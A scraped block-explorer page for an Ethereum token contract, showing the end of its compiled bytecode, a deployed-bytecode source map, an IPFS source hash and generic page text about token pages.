91505b602082108103610c0d57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561033257610332610c13565b634e487b7160e01b600052603260045260246000fd5b600060018201610c6457610c64610c13565b506001019056fea2646970667358221220d1c2ad6234805d3c6d0ac0a4a6a6caa28b5ccd9fb3a7a887730449bb7c5558e464736f6c63430008120033
Deployed Bytecode Sourcemap
20522:148:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8730:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11610:201;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;11610:201:0;1004:187:1;10379:108:0;10467:12;;10379:108;;;1342:25:1;;;1330:2;1315:18;10379:108:0;1196:177:1;12391:295:0;;;;;;:::i;:::-;;:::i;9692:93::-;;;9775:2;1853:36:1;;1841:2;1826:18;9692:93:0;1711:184:1;13095:238:0;;;;;;:::i;:::-;;:::i;10206:108::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10286:20:0;10262:4;10286:20;;;:8;:20;;;;;;;;;10206:108;9998:200;;;;;;:::i;:::-;;:::i;:::-;;10550:127;;;;;;:::i;:::-;-1:-1:-1;;;;;10651:18:0;10624:7;10651:18;;;:9;:18;;;;;;;10550:127;5843:103;;;:::i;9793:197::-;;;;;;:::i;:::-;;:::i;5202:87::-;5248:7;5275:6;5202:87;;-1:-1:-1;;;;;5275:6:0;;;2857:51:1;;2845:2;2830:18;5202:87:0;2711:203:1;8949:104:0;;;:::i;13836:436::-;;;;;;:::i;:::-;;:::i;10883:193::-;;;;;;:::i;:::-;;:::i;11139:151::-;;;;;;:::i;:::-;;:::i;6101:201::-;;;;;;:::i;:::-;;:::i;8730:100::-;8784:13;8817:5;8810:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8730:100;:::o;11610:201::-;11693:4;3991:10;11749:32;3991:10;11765:7;11774:6;11749:8;:32::i;:::-;11799:4;11792:11;;;11610:201;;;;;:::o;12391:295::-;12522:4;3991:10;12580:38;12596:4;3991:10;12611:6;12580:15;:38::i;:::-;12629:27;12639:4;12645:2;12649:6;12629:9;:27::i;:::-;-1:-1:-1;12674:4:0;;12391:295;-1:-1:-1;;;;12391:295:0:o;13095:238::-;13183:4;3991:10;13239:64;3991:10;13255:7;13292:10;13264:25;3991:10;13255:7;13264:9;:25::i;:::-;:38;;;;:::i;:::-;13239:8;:64::i;9998:200::-;5088:13;:11;:13::i;:::-;10088:9:::1;10083:108;10103:22:::0;;::::1;10083:108;;;10174:5;10147:8;:24;10156:11;;10168:1;10156:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;10147:24:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;10147:24:0;:32;;-1:-1:-1;;10147:32:0::1;::::0;::::1;;::::0;;;::::1;::::0;;10127:3;::::1;::::0;::::1;:::i;:::-;;;;10083:108;;;;9998:200:::0;;:::o;5843:103::-;5088:13;:11;:13::i;:::-;5908:30:::1;5935:1;5908:18;:30::i;:::-;5843:103::o:0;9793:197::-;5088:13;:11;:13::i;:::-;9881:9:::1;9876:107;9896:22:::0;;::::1;9876:107;;;9967:4;9940:8;:24;9949:11;;9961:1;9949:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;9940:24:0::1;::::0;;::::1;::::0;::::1;::::0;;;;;;-1:-1:-1;9940:24:0;:31;;-1:-1:-1;;9940:31:0::1;::::0;::::1;;::::0;;;::::1;::::0;;9920:3;::::1;::::0;::::1;:::i;:::-;;;;9876:107;;8949:104:::0;9005:13;9038:7;9031:14;;;;;:::i;13836:436::-;13929:4;3991:10;13929:4;14012:25;3991:10;14029:7;14012:9;:25::i;:::-;13985:52;;14076:15;14056:16;:35;;14048:85;;;;-1:-1:-1;;;14048:85:0;;4305:2:1;14048:85:0;;;4287:21:1;4344:2;4324:18;;;4317:30;4383:34;4363:18;;;4356:62;-1:-1:-1;;;4434:18:1;;;4427:35;4479:19;;14048:85:0;;;;;;;;;14169:60;14178:5;14185:7;14213:15;14194:16;:34;14169:8;:60::i;10883:193::-;10962:4;3991:10;11018:28;3991:10;11035:2;11039:6;11018:9;:28::i;11139:151::-;-1:-1:-1;;;;;11255:18:0;;;11228:7;11255:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11139:151::o;6101:201::-;5088:13;:11;:13::i;:::-;-1:-1:-1;;;;;6190:22:0;::::1;6182:73;;;::::0;-1:-1:-1;;;6182:73:0;;4711:2:1;6182:73:0::1;::::0;::::1;4693:21:1::0;4750:2;4730:18;;;4723:30;4789:34;4769:18;;;4762:62;-1:-1:-1;;;4840:18:1;;;4833:36;4886:19;;6182:73:0::1;4509:402:1::0;6182:73:0::1;6266:28;6285:8;6266:18;:28::i;:::-;6101:201:::0;:::o;17863:380::-;-1:-1:-1;;;;;17999:19:0;;17991:68;;;;-1:-1:-1;;;17991:68:0;;5118:2:1;17991:68:0;;;5100:21:1;5157:2;5137:18;;;5130:30;5196:34;5176:18;;;5169:62;-1:-1:-1;;;5247:18:1;;;5240:34;5291:19;;17991:68:0;4916:400:1;17991:68:0;-1:-1:-1;;;;;18078:21:0;;18070:68;;;;-1:-1:-1;;;18070:68:0;;5523:2:1;18070:68:0;;;5505:21:1;5562:2;5542:18;;;5535:30;5601:34;5581:18;;;5574:62;-1:-1:-1;;;5652:18:1;;;5645:32;5694:19;;18070:68:0;5321:398:1;18070:68:0;-1:-1:-1;;;;;18151:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18203:32;;1342:25:1;;;18203:32:0;;1315:18:1;18203:32:0;;;;;;;17863:380;;;:::o;18534:453::-;18669:24;18696:25;18706:5;18713:7;18696:9;:25::i;:::-;18669:52;;-1:-1:-1;;18736:16:0;:37;18732:248;;18818:6;18798:16;:26;;18790:68;;;;-1:-1:-1;;;18790:68:0;;5926:2:1;18790:68:0;;;5908:21:1;5965:2;5945:18;;;5938:30;6004:31;5984:18;;;5977:59;6053:18;;18790:68:0;5724:353:1;18790:68:0;18902:51;18911:5;18918:7;18946:6;18927:16;:25;18902:8;:51::i;:::-;18658:329;18534:453;;;:::o;14742:840::-;-1:-1:-1;;;;;14873:18:0;;14865:68;;;;-1:-1:-1;;;14865:68:0;;6284:2:1;14865:68:0;;;6266:21:1;6323:2;6303:18;;;6296:30;6362:34;6342:18;;;6335:62;-1:-1:-1;;;6413:18:1;;;6406:35;6458:19;;14865:68:0;6082:401:1;14865:68:0;-1:-1:-1;;;;;14952:16:0;;14944:64;;;;-1:-1:-1;;;14944:64:0;;6690:2:1;14944:64:0;;;6672:21:1;6729:2;6709:18;;;6702:30;6768:34;6748:18;;;6741:62;-1:-1:-1;;;6819:18:1;;;6812:33;6862:19;;14944:64:0;6488:399:1;14944:64:0;15021:38;15042:4;15048:2;15052:6;15021:20;:38::i;:::-;-1:-1:-1;;;;;15094:15:0;;15072:19;15094:15;;;:9;:15;;;;;;15128:21;;;;15120:72;;;;-1:-1:-1;;;15120:72:0;;7094:2:1;15120:72:0;;;7076:21:1;7133:2;7113:18;;;7106:30;7172:34;7152:18;;;7145:62;-1:-1:-1;;;7223:18:1;;;7216:36;7269:19;;15120:72:0;6892:402:1;15120:72:0;-1:-1:-1;;;;;15228:15:0;;;;;;;:9;:15;;;;;;15246:20;;;15228:38;;15446:13;;;;;;;;;;:23;;;;;;15498:26;;;;;;15260:6;1342:25:1;;1330:2;1315:18;;1196:177;15498:26:0;;;;;;;;15537:37;9998:200;5367:132;5248:7;5275:6;-1:-1:-1;;;;;5275:6:0;3991:10;5431:23;5423:68;;;;-1:-1:-1;;;5423:68:0;;7501:2:1;5423:68:0;;;7483:21:1;;;7520:18;;;7513:30;7579:34;7559:18;;;7552:62;7631:18;;5423:68:0;7299:356:1;6462:191:0;6536:16;6555:6;;-1:-1:-1;;;;;6572:17:0;;;-1:-1:-1;;;;;;6572:17:0;;;;;;6605:40;;6555:6;;;;;;;6605:40;;6536:16;6605:40;6525:128;6462:191;:::o;19587:200::-;-1:-1:-1;;;;;19717:12:0;;;;;;:8;:12;;;;;;;;;:30;;-1:-1:-1;;;;;;19733:14:0;;;;;;:8;:14;;;;;;;;19717:30;19713:72;;;19757:15;;;;:23;;:15;:23;19749:36;;;;-1:-1:-1;;;19749:36:0;;7862:2:1;19749:36:0;;;7844:21:1;-1:-1:-1;7881:18:1;;;7874:29;7920:18;;19749:36:0;7660:284:1;14:548;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:186::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;2051:29;2070:9;2051:29;:::i;:::-;2041:39;1900:186;-1:-1:-1;;;1900:186:1:o;2091:615::-;2177:6;2185;2238:2;2226:9;2217:7;2213:23;2209:32;2206:52;;;2254:1;2251;2244:12;2206:52;2294:9;2281:23;2323:18;2364:2;2356:6;2353:14;2350:34;;;2380:1;2377;2370:12;2350:34;2418:6;2407:9;2403:22;2393:32;;2463:7;2456:4;2452:2;2448:13;2444:27;2434:55;;2485:1;2482;2475:12;2434:55;2525:2;2512:16;2551:2;2543:6;2540:14;2537:34;;;2567:1;2564;2557:12;2537:34;2620:7;2615:2;2605:6;2602:1;2598:14;2594:2;2590:23;2586:32;2583:45;2580:65;;;2641:1;2638;2631:12;2580:65;2672:2;2664:11;;;;;2694:6;;-1:-1:-1;2091:615:1;;-1:-1:-1;;;;2091:615:1:o;2919:260::-;2987:6;2995;3048:2;3036:9;3027:7;3023:23;3019:32;3016:52;;;3064:1;3061;3054:12;3016:52;3087:29;3106:9;3087:29;:::i;:::-;3077:39;;3135:38;3169:2;3158:9;3154:18;3135:38;:::i;:::-;3125:48;;2919:260;;;;;:::o;3184:380::-;3263:1;3259:12;;;;3306;;;3327:61;;3381:4;3373:6;3369:17;3359:27;;3327:61;3434:2;3426:6;3423:14;3403:18;3400:38;3397:161;;3480:10;3475:3;3471:20;3468:1;3461:31;3515:4;3512:1;3505:15;3543:4;3540:1;3533:15;3397:161;;3184:380;;;:::o;3569:127::-;3630:10;3625:3;3621:20;3618:1;3611:31;3661:4;3658:1;3651:15;3685:4;3682:1;3675:15;3701:125;3766:9;;;3787:10;;;3784:36;;;3800:18;;:::i;3831:127::-;3892:10;3887:3;3883:20;3880:1;3873:31;3923:4;3920:1;3913:15;3947:4;3944:1;3937:15;3963:135;4002:3;4023:17;;;4020:43;;4043:18;;:::i;:::-;-1:-1:-1;4090:1:1;4079:13;;3963:135::o
Swarm Source
ipfs://d1c2ad6234805d3c6d0ac0a4a6a6caa28b5ccd9fb3a7a887730449bb7c5558e4
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.